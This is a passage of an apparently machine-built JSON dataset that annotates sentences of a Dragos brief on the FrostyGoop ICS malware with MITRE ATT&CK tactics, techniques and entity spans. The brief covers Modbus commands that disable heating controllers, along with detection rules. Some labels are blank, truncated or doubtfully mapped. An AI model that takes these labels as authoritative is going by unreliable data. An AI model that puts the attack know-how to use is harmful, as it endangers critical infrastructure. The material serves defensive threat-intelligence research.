"start": 186, "end": 210, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-88_mitre_report-p8-s95-649df4", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 8, "sentence_id": 95, "context_before": "A forensic examination during the investigation showed that the adversaries sent Modbus commands directly to the district heating system controllers from adversary hosts, facilitated by hardcoded network routes.", "sentence_text": "The affected heating system controllers were ENCO Controllers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p8-s96-f5fe1c", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 8, "sentence_id": 96, "context_before": "The affected heating system controllers were ENCO Controllers.", "sentence_text": "The adversaries did not attempt to destroy the controllers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p8-s97-b6bd22", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 8, "sentence_id": 97, "context_before": "The adversaries did not attempt to destroy the controllers.", "sentence_text": "FrostyGoop functionality uses the Modbus TCP protocol generically, meaning it could affect many devices.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T0885", "name": "" } ], "procedure": "functionality uses the Modbus TCP protocol generically", "entities": [ { "text": "FrostyGoop", "start": 0, "end": 10, "label": "MalwareTool" }, { "text": "Modbus TCP protocol", "start": 34, "end": 53, "label": "Infrastructure_Indicator" }, { "text": "uses", "start": 25, "end": 29, "label": "Action" }, { "text": "affect", "start": 84, "end": 90, "label": "Action" } ] }, { "uid": "mitre-88_mitre_report-p8-s98-5bb925", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 8, "sentence_id": 98, "context_before": "FrostyGoop functionality uses the Modbus TCP protocol generically, meaning it could affect many devices.", "sentence_text": "We want to express our gratitude to the Cyber Security Situation Center (CSSC), a part of the Security Service of Ukraine (Служба безпеки України), for its continued commitment to collaborative intelligence sharing and for allowing us to report on the disruptive OT incident impacting communities in Ukraine.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p8-s99-cd448e", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 8, "sentence_id": 99, "context_before": "We want to express our gratitude to the Cyber Security Situation Center (CSSC), a part of the Security Service of Ukraine (Служба безпеки України), for its continued commitment to collaborative intelligence sharing and for allowing us to report on the disruptive OT incident impacting communities in Ukraine.", "sentence_text": "8 sensepost/reGeorg - Github Page | 6 FrostyGoop Intel Brief", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p9-s100-79ff23", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 9, "sentence_id": 100, "context_before": "8 sensepost/reGeorg - Github Page | 6 FrostyGoop Intel Brief", "sentence_text": "Assessing the Broader Impact on OT Cybersecurity The discovery of the FrostyGoop ICS malware and its capabilities has raised significant concerns about the broader impact on OT cybersecurity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p9-s101-55ee31", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 9, "sentence_id": 101, "context_before": "Assessing the Broader Impact on OT Cybersecurity The discovery of the FrostyGoop ICS malware and its capabilities has raised significant concerns about the broader impact on OT cybersecurity.", "sentence_text": "The specific targeting of ICS using Modbus TCP over port 502 and the potential to interact directly with various ICS devices pose a serious threat to critical infrastructure across multiple sectors.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T0885", "name": "" } ], "procedure": "target ICS using Modbus TCP", "entities": [ { "text": "ICS", "start": 26, "end": 29, "label": "Infrastructure_Indicator" }, { "text": "Modbus TCP over port 502", "start": 36, "end": 60, "label": "Infrastructure_Indicator" }, { "text": "ICS devices", "start": 113, "end": 124, "label": "Infrastructure_Indicator" }, { "text": "targeting", "start": 13, "end": 22, "label": "Action" }, { "text": "interact", "start": 82, "end": 90, "label": "Action" } ] }, { "uid": "mitre-88_mitre_report-p9-s102-10af17", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 9, "sentence_id": 102, "context_before": "The specific targeting of ICS using Modbus TCP over port 502 and the potential to interact directly with various ICS devices pose a serious threat to critical infrastructure across multiple sectors.", "sentence_text": "The key findings suggest that FrostyGoop capabilities can be applied broadly.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p9-s103-c73b88", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 9, "sentence_id": 103, "context_before": "The key findings suggest that FrostyGoop capabilities can be applied broadly.", "sentence_text": "Modbus is embedded in legacy and modern systems and nearly all industrial sectors, indicating a wide-ranging potential for disrupting and compromising essential services and systems.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p9-s104-a4c3f9", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 9, "sentence_id": 104, "context_before": "Modbus is embedded in legacy and modern systems and nearly all industrial sectors, indicating a wide-ranging potential for disrupting and compromising essential services and systems.", "sentence_text": "One of the major concerns is FrostyGoop's ability to communicate with ICS devices via the Modbus TCP protocol, enabling it to send commands to read or modify data on these devices.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T0885", "name": "" } ], "procedure": "send Modbus commands to read or modify ICS data", "entities": [ { "text": "ICS devices", "start": 70, "end": 81, "label": "Infrastructure_Indicator" }, { "text": "Modbus TCP protocol", "start": 90, "end": 109, "label": "Infrastructure_Indicator" }, { "text": "FrostyGoop", "start": 29, "end": 39, "label": "MalwareTool" }, { "text": "communicate", "start": 53, "end": 64, "label": "Action" }, { "text": "send commands", "start": 126, "end": 139, "label": "Action" }, { "text": "read or modify data", "start": 143, "end": 162, "label": "Action" } ] }, { "uid": "mitre-88_mitre_report-p9-s105-514e9c", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 9, "sentence_id": 105, "context_before": "One of the major concerns is FrostyGoop's ability to communicate with ICS devices via the Modbus TCP protocol, enabling it to send commands to read or modify data on these devices.", "sentence_text": "This represents a significant risk to the integrity and functionality of ICS devices, with potentially far-reaching consequences for industrial operations and public safety.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p9-s106-5c14b2", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 9, "sentence_id": 106, "context_before": "This represents a significant risk to the integrity and functionality of ICS devices, with potentially far-reaching consequences for industrial operations and public safety.", "sentence_text": "The attack’s involvement of internet-exposed controllers and insufficient network segmentation highlights the risks of not implementing basic cybersecurity controls and the importance of doing so.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "attack's involvement of internet-exposed controllers", "entities": [ { "text": "internet-exposed controllers", "start": 28, "end": 56, "label": "Infrastructure_Indicator" }, { "text": "attack’s involvement", "start": 4, "end": 24, "label": "Action" }, { "text": "insufficient network segmentation", "start": 61, "end": 94, "label": "Action" } ] }, { "uid": "mitre-88_mitre_report-p9-s107-ac456a", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 9, "sentence_id": 107, "context_before": "The attack’s involvement of internet-exposed controllers and insufficient network segmentation highlights the risks of not implementing basic cybersecurity controls and the importance of doing so.", "sentence_text": "This includes restricting access to Modbus devices and conducting thorough network assessments to ensure they are not exposed to the Internet.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p9-s108-591468", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 9, "sentence_id": 108, "context_before": "This includes restricting access to Modbus devices and conducting thorough network assessments to ensure they are not exposed to the Internet.", "sentence_text": "Dragos’s ongoing analysis of FrostyGoop files and commitment to actively monitor the situation highlights the need for a coordinated response to a dynamic threat landscape.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p9-s109-f1fc8b", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 9, "sentence_id": 109, "context_before": "Dragos’s ongoing analysis of FrostyGoop files and commitment to actively monitor the situation highlights the need for a coordinated response to a dynamic threat landscape.", "sentence_text": "Vigilant network security monitoring, proactive defense measures, and collaborative information sharing will be crucial in mitigating the broad impact of ICS-specific malware, among other threats.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p9-s110-2ddcb4", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 9, "sentence_id": 110, "context_before": "Vigilant network security monitoring, proactive defense measures, and collaborative information sharing will be crucial in mitigating the broad impact of ICS-specific malware, among other threats.", "sentence_text": "Guidance for Dragos Customers FrostyGoop was first reported to Dragos WorldView9 subscribers in late May 2024.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p9-s111-1a0c4d", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 9, "sentence_id": 111, "context_before": "Guidance for Dragos Customers FrostyGoop was first reported to Dragos WorldView9 subscribers in late May 2024.", "sentence_text": "Dragos Platform10 detections were assessed against the threat, and indicators of compromise (IOCs) were deployed.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p9-s112-92677e", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 9, "sentence_id": 112, "context_before": "Dragos Platform10 detections were assessed against the threat, and indicators of compromise (IOCs) were deployed.", "sentence_text": "Using the Dragos Platform, OT Watch has been hunting for FrostyGoop IOCs as part of regular sweeps across the fleet of subscribers since initial WorldView reporting to ensure coverage.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p9-s113-5b76f2", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 9, "sentence_id": 113, "context_before": "Using the Dragos Platform, OT Watch has been hunting for FrostyGoop IOCs as part of regular sweeps across the fleet of subscribers since initial WorldView reporting to ensure coverage.", "sentence_text": "OT Watch has also deployed a dashboard specific to FrostyGoop-related detections and IOCs for OT Watch customers, and an upcoming Knowledge Pack will deploy a FrostyGoop Playbook.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p9-s114-73e7a3", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 9, "sentence_id": 114, "context_before": "OT Watch has also deployed a dashboard specific to FrostyGoop-related detections and IOCs for OT Watch customers, and an upcoming Knowledge Pack will deploy a FrostyGoop Playbook.", "sentence_text": "Dragos continues to analyze FrostyGoop for future Dragos Platform Knowledge Pack releases to ensure appropriate detections are created and deployed.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p9-s115-a2c277", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 9, "sentence_id": 115, "context_before": "Dragos continues to analyze FrostyGoop for future Dragos Platform Knowledge Pack releases to ensure appropriate detections are created and deployed.", "sentence_text": "The Dragos Platform detects FrostyGoop with threat detections already in place.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p9-s116-1691ed", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 9, "sentence_id": 116, "context_before": "The Dragos Platform detects FrostyGoop with threat detections already in place.", "sentence_text": "For Dragos OT Watch11 customers, our team has conducted searches for signs of this activity on your behalf – consider a lack of 9 Dragos Worldview – Dragos.com 10 Dragos Platform – Dragos.com 11 Advanced Threat Hunting for Industrial Environments – Dragos.com Page | 7 FrostyGoop Intel Brief", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p10-s117-f80e10", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 10, "sentence_id": 117, "context_before": "For Dragos OT Watch11 customers, our team has conducted searches for signs of this activity on your behalf – consider a lack of 9 Dragos Worldview – Dragos.com 10 Dragos Platform – Dragos.com 11 Advanced Threat Hunting for Industrial Environments – Dragos.com Page | 7 FrostyGoop Intel Brief", "sentence_text": "communications on this subject as confirmation that there was no evidence of this activity found within your network.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p10-s118-c4ff90", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 10, "sentence_id": 118, "context_before": "communications on this subject as confirmation that there was no evidence of this activity found within your network.", "sentence_text": "Dragos analysts also continue to proactively hunt on behalf of those in the Neighborhood Keeper12 program, our collective defense platform.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p10-s119-f077ee", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 10, "sentence_id": 119, "context_before": "Dragos analysts also continue to proactively hunt on behalf of those in the Neighborhood Keeper12 program, our collective defense platform.", "sentence_text": "Any findings relating to this activity will be reported to you.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p10-s120-412e5f", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 10, "sentence_id": 120, "context_before": "Any findings relating to this activity will be reported to you.", "sentence_text": "Knowledge SID/Rule Analytic Name Description Pack Modbus command to put device into Force Listen Only a0ddb920-0adc- Modbus Command Force Mode, making the device unresponsive to commands.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T0885", "name": "" } ], "procedure": "Modbus command to put device into Force Listen Only Mode", "entities": [ { "text": "Modbus Command", "start": 117, "end": 131, "label": "Infrastructure_Indicator" }, { "text": "put device into Force Listen Only", "start": 68, "end": 101, "label": "Action" }, { "text": "unresponsive to commands", "start": 162, "end": 186, "label": "Action" } ] }, { "uid": "mitre-88_mitre_report-p10-s121-9ceb8b", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 10, "sentence_id": 121, "context_before": "Knowledge SID/Rule Analytic Name Description Pack Modbus command to put device into Force Listen Only a0ddb920-0adc- Modbus Command Force Mode, making the device unresponsive to commands.", "sentence_text": "It 4d01-9b3d- KP_Plus-7.0.X Listen Only Mode will only respond after power up.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p10-s122-a2599a", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 10, "sentence_id": 122, "context_before": "It 4d01-9b3d- KP_Plus-7.0.X Listen Only Mode will only respond after power up.", "sentence_text": "This can be used 21414ef28607 maliciously to effectively disable devices.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p10-s123-9df54f", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 10, "sentence_id": 123, "context_before": "This can be used 21414ef28607 maliciously to effectively disable devices.", "sentence_text": "f7a0af6b-fa88- Modbus Command Modbus command to force a device to restart, making it 4382-9232- Restart Communications unresponsive until it reboots.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T0885", "name": "" } ], "procedure": "send Modbus command to force device restart", "entities": [ { "text": "Modbus Command", "start": 15, "end": 29, "label": "Infrastructure_Indicator" }, { "text": "Modbus command to force a device to restart", "start": 30, "end": 73, "label": "Action" }, { "text": " Restart Communications", "start": 95, "end": 118, "label": "Action" } ] }, { "uid": "mitre-88_mitre_report-p10-s124-aa147d", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 10, "sentence_id": 124, "context_before": "f7a0af6b-fa88- Modbus Command Modbus command to force a device to restart, making it 4382-9232- Restart Communications unresponsive until it reboots.", "sentence_text": "There is some chance this KP_Plus-7.0.X f56525befcde Option could be used maliciously to disable devices.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T0885", "name": "" } ], "procedure": "maliciously disable devices", "entities": [ { "text": "disable devices", "start": 89, "end": 104, "label": "Action" } ] }, { "uid": "mitre-88_mitre_report-p10-s125-a5c211", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 10, "sentence_id": 125, "context_before": "There is some chance this KP_Plus-7.0.X f56525befcde Option could be used maliciously to disable devices.", "sentence_text": "Modbus servers send exception codes to Modbus clients f41c99e6-cabf- when a requested operation cannot be carried out.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T0842", "name": "" } ], "procedure": "Modbus servers send exception codes when a requested operation cannot be carried out", "entities": [ { "text": "Modbus servers", "start": 0, "end": 14, "label": "Infrastructure_Indicator" }, { "text": "Modbus clients", "start": 39, "end": 53, "label": "Infrastructure_Indicator" }, { "text": "send exception codes", "start": 15, "end": 35, "label": "Action" } ] }, { "uid": "mitre-88_mitre_report-p10-s126-c06270", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 10, "sentence_id": 126, "context_before": "Modbus servers send exception codes to Modbus clients f41c99e6-cabf- when a requested operation cannot be carried out.", "sentence_text": "External device communicating with an internal asset e8cbde89-aa3a- using the Modbus protocol.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1572", "name": "Protocol Tunneling" } ], "procedure": "external device communicating via Modbus", "entities": [ { "text": "Modbus protocol", "start": 78, "end": 93, "label": "Infrastructure_Indicator" }, { "text": "communicating", "start": 16, "end": 29, "label": "Action" } ] }, { "uid": "mitre-88_mitre_report-p10-s127-363410", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 10, "sentence_id": 127, "context_before": "External device communicating with an internal asset e8cbde89-aa3a- using the Modbus protocol.", "sentence_text": "This is a major security 4093-8064- Modbus External Comms KP-2020-11 concern, as ICS devices should not be controlled outside 3a8ca08fbf4c of the OT network.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "None", "entities": [ { "text": "ICS devices", "start": 81, "end": 92, "label": "Infrastructure_Indicator" }, { "text": "OT network", "start": 146, "end": 156, "label": "Infrastructure_Indicator" }, { "text": "controlled outside", "start": 107, "end": 125, "label": "Action" } ] }, { "uid": "mitre-88_mitre_report-p10-s128-8ec3a7", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 10, "sentence_id": 128, "context_before": "This is a major security 4093-8064- Modbus External Comms KP-2020-11 concern, as ICS devices should not be controlled outside 3a8ca08fbf4c of the OT network.", "sentence_text": "External device writing to an internal asset using the 15c07ad4-5d03- Modbus protocol.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T0885", "name": "" } ], "procedure": "external device writing to asset via Modbus", "entities": [ { "text": "Modbus protocol", "start": 70, "end": 85, "label": "Infrastructure_Indicator" }, { "text": "writing", "start": 16, "end": 23, "label": "Action" }, { "text": "internal asse", "start": 30, "end": 43, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-88_mitre_report-p10-s129-4837ca", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 10, "sentence_id": 129, "context_before": "External device writing to an internal asset using the 15c07ad4-5d03- Modbus protocol.", "sentence_text": "This is a major security concern, as ICS 4c3b-8d2d- Modbus External Write KP-2020-11 devices should not be controlled outside of the OT 613d5ec45217 network.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "ICS devices controlled outside of the OT network via Modbus External Write", "entities": [ { "text": "ICS", "start": 37, "end": 40, "label": "Infrastructure_Indicator" }, { "text": "OT 613d5ec45217 network", "start": 133, "end": 156, "label": "Infrastructure_Indicator" }, { "text": "controlled outside", "start": 107, "end": 125, "label": "Action" } ] }, { "uid": "mitre-88_mitre_report-p10-s130-95ca0e", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 10, "sentence_id": 130, "context_before": "This is a major security concern, as ICS 4c3b-8d2d- Modbus External Write KP-2020-11 devices should not be controlled outside of the OT 613d5ec45217 network.", "sentence_text": "3cc434cd-5086- Modbus Write Observed Modbus traffic with a write function code seen for the 454c-bbd4- KP-2022-009 for First Time first time to a specific host.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T0885", "name": "" } ], "procedure": "Modbus traffic with a write function code seen for the first time", "entities": [ { "text": "Modbus traffic", "start": 37, "end": 51, "label": "Infrastructure_Indicator" }, { "text": "specific host", "start": 146, "end": 159, "label": "Infrastructure_Indicator" }, { "text": "Modbus Write Observed", "start": 15, "end": 36, "label": "Action" }, { "text": "seen", "start": 79, "end": 83, "label": "Action" } ] }, { "uid": "mitre-88_mitre_report-p10-s131-7097b8", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 10, "sentence_id": 131, "context_before": "3cc434cd-5086- Modbus Write Observed Modbus traffic with a write function code seen for the 454c-bbd4- KP-2022-009 for First Time first time to a specific host.", "sentence_text": "6142b01a4623 d323014b-abee- New ModbusTCP Monitors for new devices using the ModbusTCP 461b-a12f- KP-2020-11 Detection protocol and generates events when activity is seen 641b8796070f", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T0846", "name": "" } ], "procedure": "new devices using the ModbusTCP protocol", "entities": [ { "text": "ModbusTCP", "start": 32, "end": 41, "label": "Infrastructure_Indicator" }, { "text": "Monitors for new devices", "start": 42, "end": 66, "label": "Action" }, { "text": "generates events when activity is seen", "start": 132, "end": 170, "label": "Action" } ] }, { "uid": "mitre-88_mitre_report-p10-s133-ad7d0f", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 10, "sentence_id": 133, "context_before": "Summary Guidance 1.", "sentence_text": "Identify impacted assets: Access your Asset Inventory and search for ENCO control servers and devices communicating over Modbus.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p10-s134-bcedb3", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 10, "sentence_id": 134, "context_before": "Identify impacted assets: Access your Asset Inventory and search for ENCO control servers and devices communicating over Modbus.", "sentence_text": "12 Dragos Neighborhood Keeper - dragos.com Page | 8 FrostyGoop Intel Brief", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p11-s135-893960", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 11, "sentence_id": 135, "context_before": "12 Dragos Neighborhood Keeper - dragos.com Page | 8 FrostyGoop Intel Brief", "sentence_text": "2. Look for potential malicious behavior: Review the FrostyGoop-specific dashboard to determine if related detections and IOCs have been triggered.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p11-s136-895d54", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 11, "sentence_id": 136, "context_before": "2. Look for potential malicious behavior: Review the FrostyGoop-specific dashboard to determine if related detections and IOCs have been triggered.", "sentence_text": "3. Perform a retrospective search for potential malicious behavior across your SiteStore forensics for signs of past activity involving this malware.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p11-s137-ec866f", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 11, "sentence_id": 137, "context_before": "3. Perform a retrospective search for potential malicious behavior across your SiteStore forensics for signs of past activity involving this malware.", "sentence_text": "The Dragos Platform has advanced OT-native threat detection mechanisms to identify abnormal connections and communications over Modbus.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p11-s138-d9399a", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 11, "sentence_id": 138, "context_before": "The Dragos Platform has advanced OT-native threat detection mechanisms to identify abnormal connections and communications over Modbus.", "sentence_text": "It also incorporates threat-based behavioral analytics that are fine-tuned to recognize attack patterns and behaviors that exploit the Modbus protocol.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p11-s139-cf212d", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 11, "sentence_id": 139, "context_before": "It also incorporates threat-based behavioral analytics that are fine-tuned to recognize attack patterns and behaviors that exploit the Modbus protocol.", "sentence_text": "Dragos WorldView threat intelligence further enhances situational awareness by providing in-the-moment insights into the threat landscape.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p11-s140-9035d7", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 11, "sentence_id": 140, "context_before": "Dragos WorldView threat intelligence further enhances situational awareness by providing in-the-moment insights into the threat landscape.", "sentence_text": "Dragos Platform customers can use the information in Dragos Worldview reports to start manual hunts for potential malicious activity in their environments.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p11-s141-746c2d", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 11, "sentence_id": 141, "context_before": "Dragos Platform customers can use the information in Dragos Worldview reports to start manual hunts for potential malicious activity in their environments.", "sentence_text": "Recommendations – Implement 5 Critical Controls", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p11-s142-8aaab6", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 11, "sentence_id": 142, "context_before": "Recommendations – Implement 5 Critical Controls", "sentence_text": "The cyber threat characterized by deploying the FrostyGoop underscores a significant vulnerability in operational technology infrastructure.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T0869", "name": "" } ], "procedure": "deploy FrostyGoop", "entities": [ { "text": "FrostyGoop", "start": 48, "end": 58, "label": "MalwareTool" }, { "text": "deploying", "start": 34, "end": 43, "label": "Action" }, { "text": "operational technology infrastructure", "start": 102, "end": 139, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-88_mitre_report-p11-s143-fffff7", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 11, "sentence_id": 143, "context_before": "The cyber threat characterized by deploying the FrostyGoop underscores a significant vulnerability in operational technology infrastructure.", "sentence_text": "The adversary exploited unsecured network points and inadequately protected systems, disrupting municipal services that resulted in considerable discomfort and potential danger to the affected population.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T0826", "name": "" } ], "procedure": "exploit unsecured networks and disrupt services", "entities": [ { "text": "adversary", "start": 4, "end": 13, "label": "ThreatActor" }, { "text": "exploited", "start": 14, "end": 23, "label": "Action" }, { "text": "disrupting municipal services", "start": 85, "end": 114, "label": "Action" }, { "text": "unsecured network points", "start": 24, "end": 48, "label": "Infrastructure_Indicator" }, { "text": "inadequately protected systems", "start": 53, "end": 83, "label": "Infrastructure_Indicator" }, { "text": "resulted in considerable discomfort", "start": 120, "end": 155, "label": "Action" } ] }, { "uid": "mitre-88_mitre_report-p11-s144-2daa39", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 11, "sentence_id": 144, "context_before": "The adversary exploited unsecured network points and inadequately protected systems, disrupting municipal services that resulted in considerable discomfort and potential danger to the affected population.", "sentence_text": "Each control addresses specific aspects of cybersecurity readiness and resilience, each tailored to defend against the threats identified in this report.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p11-s145-8ea668", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 11, "sentence_id": 145, "context_before": "Each control addresses specific aspects of cybersecurity readiness and resilience, each tailored to defend against the threats identified in this report.", "sentence_text": "Here, we detail the necessity and application of these controls in the context of this threat.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p11-s146-753db5", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 11, "sentence_id": 146, "context_before": "Here, we detail the necessity and application of these controls in the context of this threat.", "sentence_text": "1. ICSINCIDENTRESPONSE\nGiven the complexity and targeted nature of the FrostyGoop attack, a robust incident response plan is crucial.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p11-s147-fabbfd", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 11, "sentence_id": 147, "context_before": "1. ICSINCIDENTRESPONSE\nGiven the complexity and targeted nature of the FrostyGoop attack, a robust incident response plan is crucial.", "sentence_text": "This plan should incorporate specialized responses for OT environments, as these systems often have operational continuity requirements that supersede traditional IT systems.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p11-s148-64abd7", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 11, "sentence_id": 148, "context_before": "This plan should incorporate specialized responses for OT environments, as these systems often have operational continuity requirements that supersede traditional IT systems.", "sentence_text": "Training and regular drills specific to Modbus and ICS-targeted attacks will also ensure preparedness and effective incident management.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-88_mitre_report-p11-s149-282db9", "source": "mitre", "doc_id": "88_mitre_report", "page_number": 11, "sentence_id": 149, "context_before": "Training and regular drills specific to Modbus and ICS-targeted attacks will also ensure preparedness and effective incident management.", "sentence_text": "2. DEFENSIBLEARCHITECTURE\nThis attack highlights the lack of adequate network segmentation and the presence of internet-exposed controllers.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T0883", "name": "" } ], "procedure": "attack leveraged lack of adequate network segmentation and internet-exposed controllers", "entities": [ { "text": "internet-exposed controllers", "start": 111, "end": 139, "label": "Infrastructure_Indicator" }, { "text": "attack", "start": 31, "end": 37, "label": "Action" }, { "text": "lack of adequate network segmentation", "start": 53, "end": 90, "label": "Action" } ] }, { 